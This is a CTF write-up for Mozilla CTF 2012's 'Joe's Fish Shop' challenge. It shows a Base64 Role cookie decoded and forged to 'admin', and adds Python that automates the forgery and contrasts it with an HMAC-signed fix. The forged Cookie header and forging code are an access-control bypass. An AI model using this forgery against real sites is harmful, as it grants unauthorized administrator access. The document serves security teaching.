Thursday, January 26, 2012

Mozilla CTF 2012 - Joe's Fish Shop

Challenge:
Go, get some tasty dinner over at Joe's Fish Shop! If you know how to play the admin, you'll get free dessert! :)

Solution:

This is the first challenge we solved.  We used Burp Suite Pro (BSP) to proxy
all our traffic to and from the challenge web site.  Loading the initial page
for challenge 12, we captured the following HTTP headers in the response:

HTTP/1.0 200 OK
Date: Wed, 25 Jan 2012 13:06:49 GMT
Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.9 with Suhosin-Patch
X-Powered-By: PHP/5.3.9
Content-Length: 1659
Content-Type: text/html
Set-Cookie: Role=bm9uX2FkbWlu
Set-Cookie: ID=current_user
Set-Cookie: _tmp=d0f0elfe
Set-Cookie: access=none
Connection: close

Notice that the server sets a cookie named Role to a 12-character value made
up only of letters and digits.  A length that is a multiple of 4 and a
character set drawn from the Base64 alphabet (A-Z, a-z, 0-9, + and /, with
optional = padding) is a strong hint that the value is Base64 encoded rather
than a random token.  We sent the value of the Role cookie to the Decoder
tab in BSP, selected Decode as Base64 and saw this:
non_admin
That's interesting: the cookie carries the user's role in the clear, merely
encoded.  We used BSP's Decoder tab to Base64 encode the string admin, and
copied the result (YWRtaW4=) to the clipboard.

We then reloaded the challenge page, caught the request in BSP's Intercept
tab, and changed the value of the Role cookie to YWRtaW4=.  The modified
Cookie header looked like:
Cookie: Role=YWRtaW4=; ID=current_user; _tmp=d0f0elfe; access=none

After forwarding the modified request on to the server, we received the flag:
Welcome Administrator.  Please take your flag:  x0sld0ef0d

The root cause is that the server makes its authorization decision from a
cookie the client fully controls.  Base64 is an encoding, not encryption or
a signature, so it hides nothing from anyone who looks at the value, and the
server has no way to tell a forged Role cookie from one it issued itself.
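The following is an added example, not code from the original write-up or from the CTF organisers. It automates the three steps above in Python: spotting which Set-Cookie values look like Base64, re-encoding an overridden value and rebuilding the Cookie request header, and then contrasting a server-side check that trusts the cookie (the behaviour the challenge exhibited) with an HMAC-signed role cookie that rejects a forged value. The captured cookie lines are copied from the headers above; the server secret, the function names and the signed-cookie format are assumptions made for the example.

```python
import base64
import binascii
import hashlib
import hmac
import re
from http.cookies import SimpleCookie

# The four Set-Cookie values captured from the challenge response above
# (constructed here as a list of header values, exactly as the server sent them).
CAPTURED_SET_COOKIES = [
    "Role=bm9uX2FkbWlu",
    "ID=current_user",
    "_tmp=d0f0elfe",
    "access=none",
]

# Base64 alphabet with at most two '=' padding characters.
_B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def try_b64_decode(value: str):
    """Return the decoded text if value is well-formed Base64 of printable ASCII, else None.

    Short random tokens such as 'none' or 'd0f0elfe' also match the alphabet and
    length rule, so the decoded bytes are checked for printability to weed them out.
    """
    if len(value) % 4 != 0 or not _B64_RE.match(value):
        return None
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def find_encoded_cookies(set_cookie_lines):
    """Map cookie name -> decoded value for every cookie whose value is printable Base64."""
    found = {}
    for line in set_cookie_lines:
        jar = SimpleCookie()
        jar.load(line)
        for name, morsel in jar.items():
            decoded = try_b64_decode(morsel.value)
            if decoded is not None:
                found[name] = decoded
    return found


def forge_cookie_header(set_cookie_lines, overrides):
    """Rebuild the Cookie request header, Base64-encoding overridden values the way the server does."""
    parts = []
    for line in set_cookie_lines:
        name, _, value = line.partition("=")
        if name in overrides:
            value = base64.b64encode(overrides[name].encode()).decode()
        parts.append(f"{name}={value}")
    return "Cookie: " + "; ".join(parts)


def vulnerable_is_admin(cookie_header):
    """What the challenge server evidently did: trust whatever Base64 the client put in Role."""
    body = cookie_header[len("Cookie: "):]
    cookies = dict(part.strip().split("=", 1) for part in body.split(";"))
    return base64.b64decode(cookies["Role"]).decode() == "admin"


# Assumption for the hardened variant: a secret only the server knows.
# A real deployment would load a random per-deployment key, not a literal.
SERVER_SECRET = b"constructed-demo-secret"


def sign_role(role):
    """Issue a role cookie as '<role>.<hex HMAC-SHA256 over role>'."""
    mac = hmac.new(SERVER_SECRET, role.encode(), hashlib.sha256).hexdigest()
    return f"{role}.{mac}"


def hardened_is_admin(role_cookie):
    """Accept the role only if the MAC verifies; a client cannot produce a valid MAC without the key."""
    role, _, mac = role_cookie.rpartition(".")
    expected = hmac.new(SERVER_SECRET, role.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected) and role == "admin"


if __name__ == "__main__":
    print(find_encoded_cookies(CAPTURED_SET_COOKIES))
    forged = forge_cookie_header(CAPTURED_SET_COOKIES, {"Role": "admin"})
    print(forged)
    print("vulnerable server grants admin:", vulnerable_is_admin(forged))
    print("hardened server accepts forged cookie:", hardened_is_admin("admin.deadbeef"))
```

Signing the cookie stops forgery but still leaves the role in the cookie and allows a captured legitimate admin cookie to be replayed; keeping the role server-side, keyed by an opaque random session identifier, avoids both problems and is the usual choice.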
